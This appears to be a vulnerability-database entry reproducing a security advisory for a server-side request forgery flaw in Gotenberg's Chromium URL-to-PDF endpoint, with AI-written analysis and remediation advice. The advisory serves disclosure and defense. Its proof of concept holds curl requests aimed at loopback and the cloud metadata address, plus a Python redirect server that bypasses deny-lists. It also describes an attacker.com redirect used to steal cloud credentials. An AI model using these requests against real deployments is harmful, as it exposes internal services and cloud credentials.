Severity by source
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Lifecycle Timeline
3DescriptionGitHub Advisory
A review of 4 published Gotenberg security advisories exposed an SSRF issue. GHSA-pjrr-jgp4-v2fm covers SSRF via the downloadFrom endpoint. GHSA-pcrp-7g9h-7qhp covers SSRF via the webhook endpoint. Neither advisory addresses SSRF through the primary Chromium URL-to-PDF conversion endpoint (/forms/chromium/convert/url), which has no default deny-list for HTTP/HTTPS targets. The redirect-based deny-list bypass described here also applies to downloadFrom and webhook but is a separate finding from the initial request validation those advisories cover.
Summary
Gotenberg's Chromium URL-to-PDF endpoint (/forms/chromium/convert/url) has no default protection against HTTP/HTTPS-based SSRF. The default deny-list regex only blocks file:// URIs. An unauthenticated attacker can point Chromium at any internal IP - including loopback, RFC 1918 ranges, and cloud metadata endpoints - and receive the response rendered as a PDF.
Additionally, even when operators configure a custom deny-list, the protection is bypassed via HTTP redirects. Gotenberg's Chromium instance follows 302 redirects from an attacker-controlled external URL to internal targets without re-validating the redirect destination against the deny-list.
What makes this particularly notable is that Gotenberg's secondary features - downloadFrom and webhook - ship with default deny-lists that explicitly block RFC 1918 and link-local addresses. The primary feature, the one that literally takes a URL and fetches it server-side, does not.
Details
Finding 1: Zero default SSRF protection on Chromium URL endpoint
The Chromium URL endpoint is the core feature of Gotenberg. It accepts a URL, tells headless Chromium to fetch it, and returns the rendered page as a PDF. The default deny-list is configured in pkg/modules/chromium/chromium.go and the value shipped in Docker is:
^file:(?!//\/tmp/).*This regex only blocks file:// URIs outside of /tmp/. HTTP and HTTPS requests to any host - including 127.0.0.1, 10.x.x.x, 192.168.x.x, and 169.254.169.254 - are not filtered at all.
Meanwhile, the downloadFrom and webhook endpoints use deny-lists that explicitly block loopback, RFC 1918, and cloud metadata IPs. The developer clearly understood the SSRF risk but the protection was not applied to the main Chromium conversion endpoint.
Finding 2: Redirect-based SSRF bypass on all endpoints
Both downloadFrom and webhook use Go's default http.Client{} with no CheckRedirect function. Go follows up to 10 redirects automatically. The deny-list is a pre-flight check on the initial URL only. Once the request is in flight, redirects are followed transparently and the application never re-validates the destination.
The Chromium browser similarly follows redirects without restriction. Even if an operator configures a custom deny-list on the Chromium URL endpoint, an attacker hosts a redirect server that passes initial validation and then redirects Chromium to an internal target.
PoC
Tested on Docker using gotenberg/gotenberg:8 (v8.30.1) on localhost:3000. No authentication is required on any endpoint.
Environment:
$ curl http://localhost:3000/version
8.30.1
$ curl http://localhost:3000/health
{"status":"up","details":{"chromium":{"status":"up"},"libreoffice":{"status":"up"}}}1. Control - external URL works as expected:
$ curl -X POST http://localhost:3000/forms/chromium/convert/url \
--form 'url=http://example.com' \
-o test.pdf -w "HTTP %{http_code}, Size: %{size_download} bytes"
HTTP 200, Size: 14961 bytes
$ file test.pdf
test.pdf: PDF document, version 1.4, 1 page(s)2. Control - file:// protocol is correctly blocked by default deny-list:
$ curl -X POST http://localhost:3000/forms/chromium/convert/url \
--form 'url=file:///etc/passwd' \
-w "HTTP %{http_code}"
HTTP 403
Body: Forbidden3. SSRF to localhost - NOT blocked:
$ curl -X POST http://localhost:3000/forms/chromium/convert/url \
--form 'url=http://127.0.0.1:3000/health' \
-o ssrf.pdf -w "HTTP %{http_code}, Size: %{size_download} bytes"
HTTP 200, Size: 10196 bytesChromium fetched its own /health endpoint and rendered the response as a PDF. The request succeeded because the default deny-list does not cover HTTP to loopback.
4. Cloud metadata IP - NOT blocked:
$ curl --max-time 15 -X POST http://localhost:3000/forms/chromium/convert/url \
--form 'url=http://169.254.169.254/latest/meta-data/' \
-o meta.pdf -w "HTTP %{http_code}, Size: %{size_download} bytes"
HTTP 000, Size: 0 bytes (timeout - no metadata service in Docker, but request was NOT blocked)The request timed out because there is no metadata service running in the Docker test environment. The critical observation is that Gotenberg did not block or reject the request. In a cloud deployment (AWS, GCP, Azure), this would return IAM credentials rendered as a PDF.
5. Redirect-based bypass - Chromium follows 302 to internal target:
Redirect server on the host (port 9999):
from http.server import HTTPServer, BaseHTTPRequestHandler
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', 'http://127.0.0.1:3000/health')
self.end_headers()
def do_HEAD(self):
self.do_GET()
HTTPServer(('0.0.0.0', 9999), RedirectHandler).serve_forever()$ curl --max-time 15 -X POST http://localhost:3000/forms/chromium/convert/url \
--form 'url=http://172.17.0.1:9999/' \
-o redir.pdf -w "HTTP %{http_code}, Size: %{size_download} bytes"
HTTP 200, Size: 10244 bytes
$ file redir.pdf
redir.pdf: PDF document, version 1.4, 1 page(s)Chromium followed the 302 redirect from http://172.17.0.1:9999/ (external, passes any deny-list) to http://127.0.0.1:3000/health (internal). The internal response was rendered as a PDF and returned to the caller. No validation occurred on the redirect destination.
The Chromium endpoint accepted all HTTP/HTTPS URLs including loopback and cloud metadata addresses. Only file:// URIs were blocked by the default deny-list. The redirect from an external server to 127.0.0.1 was also followed without any check on the redirect target.
Impact
Any user who can reach the Gotenberg API - which requires no authentication by default - can make the server fetch arbitrary internal resources and receive the rendered content as a PDF. Gotenberg is typically deployed as a backend service in infrastructure that has broad internal network access.
Practical attack scenarios:
- Cloud credential theft: Request
http://169.254.169.254/latest/meta-data/iam/security-credentials/to exfiltrate AWS IAM role credentials. The same applies to GCP and Azure metadata endpoints. - Internal service access: Reach any HTTP service on the internal network that the Gotenberg container can route to - admin panels, databases with HTTP interfaces, monitoring dashboards.
- Internal port scanning: Use response timing and content differences to map internal infrastructure.
- Deny-list bypass via redirect: Even deployments that have configured custom deny-lists for the initial URL are vulnerable. An attacker hosts a redirect server at
https://attacker.com/rthat responds with302 → http://169.254.169.254/latest/meta-data/. The deny-list validates the initial URL, Chromium follows the redirect, and the cloud metadata is returned as a PDF.
The redirect bypass also affects the downloadFrom and webhook endpoints, which use Go's http.Client{} with no CheckRedirect function. Their RFC 1918 deny-lists are rendered ineffective by a single redirect hop.
---
AnalysisAI
Server-side request forgery in Gotenberg's Chromium URL-to-PDF endpoint allows unauthenticated remote attackers to exfiltrate cloud credentials and access internal services. The primary /forms/chromium/convert/url endpoint ships with no default deny-list for HTTP/HTTPS targets - only blocking file:// URIs - enabling direct access to AWS/GCP/Azure metadata endpoints at 169.254.169.254, RFC 1918 private networks, and localhost services. Even when administrators configure custom deny-lists, attackers bypass validation via HTTP 302 redirects, as Chromium follows redirects without re-validating destinations. Vendor-confirmed public exploit code exists (PoC in GHSA-chwh-f6gm-r836). Patch available in version 8.32.0.
Technical ContextAI
Gotenberg is a Docker-powered API for converting HTML/URL content to PDF using headless Chromium and LibreOffice, developed in Go. The SSRF vulnerability (CWE-918) stems from inadequate URL validation in the Chromium module's URL conversion handler. The default deny-list regex (^file:(?!//\/tmp/).*) in pkg/modules/chromium/chromium.go only restricts file:// protocol access outside /tmp/, leaving HTTP/HTTPS schemes completely unfiltered. The underlying Go http.Client and Chromium browser both follow HTTP redirects (up to 10 hops in Go's default behavior) without invoking deny-list re-validation on redirect destinations. This creates a time-of-check-time-of-use (TOCTOU) gap where initial URL validation is bypassed post-redirect. Notably, Gotenberg's secondary endpoints (downloadFrom, webhook) implement RFC 1918 and link-local deny-lists, indicating the developers understood SSRF risks but failed to apply equivalent controls to the primary URL-to-PDF conversion feature. The vulnerable package is github.com/gotenberg/gotenberg/v8 versions below 8.32.0.
RemediationAI
Upgrade to Gotenberg version 8.32.0 or later, which addresses both the missing HTTP/HTTPS deny-list on the Chromium endpoint and the redirect bypass vulnerability across all endpoints. The fix is available via the official GitHub release and Docker Hub image gotenberg/gotenberg:8.32.0. Organizations unable to upgrade immediately should implement network-level controls: deploy Gotenberg in an isolated network segment with explicit egress firewall rules denying access to RFC 1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), loopback (127.0.0.0/8), link-local addresses (169.254.0.0/16), and cloud metadata endpoints (169.254.169.254/32 for AWS/Azure, 169.254.169.254/32 and metadata.google.internal for GCP). Note that application-layer deny-lists in Gotenberg configuration are insufficient due to the redirect bypass - network enforcement is required. If Gotenberg must access external URLs, implement an egress proxy with strict allow-listing rather than deny-listing, and disable redirect following at the proxy layer. For containerized deployments, use Kubernetes NetworkPolicy or Docker network isolation to restrict outbound connectivity to only required external services. Trade-off: network restrictions may break legitimate use cases requiring internal URL rendering; test thoroughly in staging environments. Vendor advisory with full technical details: https://github.com/gotenberg/gotenberg/security/advisories/GHSA-chwh-f6gm-r836.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30318
GHSA-chwh-f6gm-r836